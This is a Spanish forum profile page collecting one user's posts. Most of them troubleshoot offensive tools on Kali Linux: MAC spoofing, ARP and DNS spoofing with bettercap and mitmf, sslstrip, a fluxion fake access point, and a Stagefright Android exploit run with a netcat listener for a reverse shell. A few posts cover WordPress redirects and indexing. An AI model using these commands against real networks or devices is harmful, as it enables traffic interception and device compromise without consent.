Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - $francisco

Páginas: 1 2 [3] 4 5 ... 10
41
Dudas y pedidos generales / Re:MACchanger no funciona en Kali Linux
« en: Octubre 13, 2016, 04:23:24 pm »
¿Probaste a ponerlo en modo monito?
Código: [Seleccionar]
airmon-ng wlan0 start
Código: [Seleccionar]
ifconfig wlanmon0 down
Código: [Seleccionar]
macchanger -m 11:22:33:44:33:22 wlanmon0
Código: [Seleccionar]
ifconfig wlanmon0 up

42
Todo solucionado, era eso, gracias por todas las respuestas

44
Eso fue lo que hice y al buscar mi pagina me aparecia el site map en la busqueda, incluso le di prioridad a la pagina de login pero no logro que aparezca

45
Ya no tengo el archivo ya que no lo vi necesario con esta herramienta de google pero cuando lo tenia solo contenia el siteurl donde era un archivo xml con los directorios de mi web que hice con una aplicacion, al volver a indexar google solo aparecia el archivo xml y la pagina de registro, por lo tanto solo indexo el archivo xml que salia al buscar en google mi web

46
Que tal chicos, resulta que subí una web que hice a un hosting, la envié a google y por sorpresa google no indexa mi web tan solo la de registro, (aclaro que la que quiero que me indexe es la de login)l solo tengo un filtro y el siguiente archivo .htaccess

Código: (php) [Seleccionar]
function logged_in_only() {

if ( ! is_user_logged_in() ) {
if($_SERVER['REQUEST_URI'] == '/miweb/registro/' || $_SERVER['REQUEST_URI'] == '/miweb/loginuser/'){
return;
}

header('Location: http://localhost:8080/miweb/loginuser/');
exit();
}
}


add_action( 'template_redirect', 'logged_in_only' );

add_filter('login_redirect','redirect_to',10,3);

function redirect_to(){
if (is_user_logged_in() ) {
wp_redirect(home_url());
}
}


y el .htacess

Código: [Seleccionar]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /miweb/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /miweb/index.php [L]
</IfModule>

# END WordPress

la pagina de registro es una pagina creada en la pagina administrador de worpress pero la pagina de logueo esta en el archivo wp-login donde google no la indexa solamente la de regitro, he probado creando un directorio /loginuser/ y modificando parte del archivo wp-login y guardando dentro este archivo cono index.php y funciona pero google sigue sin indexarlo y estoy usando el shell console de las herramientas de google ¿alguna idea de porque no la indexa?

47
Pero una red wifi y cableada estan en la misma lan

48
Muy buenas de nuevo, he estado consultando por google pero lo que mas bien muestra google es como saber la ip publica una vez estas conectado a la red, lo que me cuestiono es si sin estar conectados al punto acceso podemos sacar la ip publica de el, por ejemplo, nosotros utilizamos airdump-ng para capurar trafico... y podemos ver clientes conectados, la mac de los clientes y del router pero lo que no se es si se puede detectar la ip publica con alguna herramienta desde fuera de la red ¿esto es posible?

49
Pues muchas gracias por todas las respuestas, me quedo claro ahora a seguir leyendo.

50
Utilice wireshark con el filtro

Código: [Seleccionar]
ip.addr==192.168.0.1

Y me dice en algunos paquetes que se detecta una ip duplicada y me indica que es la del router, la verdad no sabia que solo fuera por cable, yo pensaba que por wifi tambien se podia hacer por cierto ¿cual es el motivo que no se pueda hacer por wifi?


51
La verdad que no se como hacer ver si le llega el response, pero he probado ha hacer el ARP por el router, tambien a solo una maquia y tambien a envenenar a toda la red, activando el dns solo consigo que funcione en la maquina de kali que es desde la que ejecuto los comandos, ni si quiera haciendo "ipconfig/flushdns" funciona los dns cambiados, probe con páginas con https y http y tampoco entonces decidí hacer algo mas sencillo

Código: (bash) [Seleccionar]
[email protected]:~# sudo bettercap -T 192.168.0.163 --proxy -I wlan0
 _          _   _
| |__   ___| |_| |_ ___ _ __ ___ __ _ _ __
| '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
| |_) |  __/ |_| ||  __/ | | (_| (_| | |_) |
|_.__/ \___|\__|\__\___|_|  \___\__,_| .__/
                                     |_| v1.5.8
http://bettercap.org/



[I] Starting [ spoofing:✔ discovery:✘ sniffer:✘ tcp-proxy:✘ http-proxy:✔ https-proxy:✘ sslstrip:✔ http-server:✘ dns-server:true ] ...

[I] [wlan0] 192.168.0.168 : x / wlan0 ( ALFA )
[I] [GATEWAY] 192.168.0.1 : x ( Huawei Technologies )
[I] [DNS] Starting on 192.168.0.168:5300 ...
[I] [TARGET] 192.168.0.163 : x ( BQ )
[I] [HTTP] Proxy starting on 192.168.0.168:8080 ...

Como podeis ver intento capturar el trafico de mi telefono movil, navego un poco con mi movil en paginas http y https y no muestra nada de ninguna de las maneras ni con bettercap ni con mitmf y ya se me acaban las ideas.

52
pero ¿supuestamente mitmf ya viene instalado? lo digo porque en la linea de comandos me dice que se ejecuta pero sigue sin capturar, lo probé con chrome y firefox pero lo que he detectado sobre todo es que no funciona el dns spoofin de ninguna de las maneras no se si alguien sabe el motivo de porque todas estas herramientas no funcionan si supuestamente son "nuevas" adaptadas para los nuevos protocolos y sistemas de protección con cache y demas...

53
he probado bettercap.

Código: (bash) [Seleccionar]
sudo bettercap -X -G 192.168.0.1 --proxy -I wlan0 -S ARP
Y no captura nada y también con mitmf.

Código: (bash) [Seleccionar]
mitmf --spoof --dns --arp --gateway 192.168.0.1 -i wlan0

Y sigo con lo mismo, sin capturar nada y en todas las webs que mira lo explican de esta manera, tambien he probado indicanto una dirección ip como target pero tampoco captura ningún trafico, ¿que puede estar pasando? Es algo realmente extraño ya que en todos los ejemplos se ve de esta manera sencilla pero ninguna funciona y ya no se de que manera para poder capturar trafico y utilizar sslstrip2 ya que bettercap y mitmf lo llevan incorporado.

54
Si no me equivoco la clave de la pide al navegar, es como si fuera un hostpot de un hotel

55
Python / Re:[cve-2015-1538-1] Exploit para android en python
« en: Octubre 05, 2016, 09:51:24 am »
Quizas sea a proposito pero se cambia rapido, solo es sustituir unas pocas cosas pero creo que esos errores los parchean enseguida

56
Python / Re:[cve-2015-1538-1] Exploit para android en python
« en: Octubre 04, 2016, 06:01:21 pm »
Yo probe con el 38164 y no funciona
Código: (bash) [Seleccionar]
mp4.py -c 192.168.0.168 -p 4444
Código: (bash) [Seleccionar]
netcat -l -p 4444
Yo tengo android 4.4.2 y no funciona supuestamente es para inferior a 5.0 y tambien probe con los demas exploit y nada

57
¿por ejemplo? es que yo estoy probando con las que trae kali que supuestamente son las mejores para pentesting o al menos eso creo.

58
Una duda que me cuestieno es ¿puede ser que ettercap no funcione? ¿ni dnsspoofin? ¿ni un ataque main in the middle? es que esta pregunta me tiene intrigado por que hace años lo probé y funcionaba y ahora estoy haciendo lo mismo y no funciona, ¿es que los router tienen seguridad ya para esto? ¿ y los navegadores?

59
¿alguien sabe por que crea una red llamada "default? a mi me crea la red que le indico pero a parte me crea otra llamada "default" y la gente que se conecta no tienen wifi ni se le sale ninguna pagina de autentificación, para explicar un poco mas lo que tengo, tengo kali con una antena wifi que soporte modo monitor y desactivo el modo "share host" de vmware y entonces conecto la antena wifi y me conecto a mi router teniendo de esta manera una ip de la red local pero no consigo tener wifi, incluso intente la siguiente manera, dejar conectado el modo "share-host" de vmware con la interfaz eth0 por donde entra internet, con wlan0 monto el fakeap con fluxion pero persiste el problema.

60
El servicio apache ya estaba levantado, fijate que puse que accedi al servidor desde el navegador, pero solucione a muy poco el problema con

Código: (bash) [Seleccionar]
echo 1 > /proc/sys/net/ipv4/ip_forward
Pero no hay manera que funcione en los demas conectados, al hacer esto ya pueden redirigir a mi ip pero solo con kali que es desde donde realizo el ataque pero como bien dices solo con http, aun asi los dns de  las victimas no cambian por ejemplo en windows 10 que es la pc 1 accede a las paginas originales y tambien probe desde el movil donde ni siquiera puede acceder a ninguna pagina cuando se realiza el ataque, es como si no resolviera ninguna url, en kali hago ping y efectivamente la ip es la mia local pero en windows 10 es la original la tabla arp tampoco cambia, lo que no entiendo es porque afecta a la maquina virtual y no a los demas si se encuentran en la misma red local, lo unico que estoy pensando es que los navegadores tienen proteccion sobre este tipo de ataques

Páginas: 1 2 [3] 4 5 ... 10